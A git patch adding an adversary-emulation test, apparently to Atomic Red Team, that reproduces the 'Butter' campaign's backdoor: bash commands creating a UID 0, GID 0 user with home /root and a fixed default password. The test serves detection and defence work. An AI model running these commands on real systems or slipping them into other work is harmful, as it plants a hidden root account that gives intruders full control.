From 4212ca043ef1c06ada1bb68a8003be63ae0b49ab Mon Sep 17 00:00:00 2001
From: Tony M Lambert <ForensicITGuy@users.noreply.github.com>
Date: Tue, 5 Feb 2019 14:04:27 -0700
Subject: [PATCH] T1136 - useradd Linux test to replicate backdoor account from
 Butter (#444)

* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* T1136 - Added useradd Linux test to replicate Butter attacks pattern
---
 atomics/T1136/T1136.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml
index 2fb50841..b6698c0b 100644
--- a/atomics/T1136/T1136.yaml
+++ b/atomics/T1136/T1136.yaml
@@ -77,3 +77,23 @@ atomic_tests:
       New-LocalUser -Name #{username} -NoPassword
       net user /add #{username}
 
+
+- name: Create a new user in Linux with `root` UID and GID.
+  description: |
+    Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
+  supported_platforms:
+    - linux
+  input_arguments:
+    username:
+      description: Username of the user to create
+      type: String
+      default: butter
+    password:
+      description: Password of the user to create
+      type: String
+      default: BetterWithButter
+  executor:
+    name: bash
+    command: |
+      useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
+      echo "#{password}" | passwd --stdin #{username}
\ No newline at end of file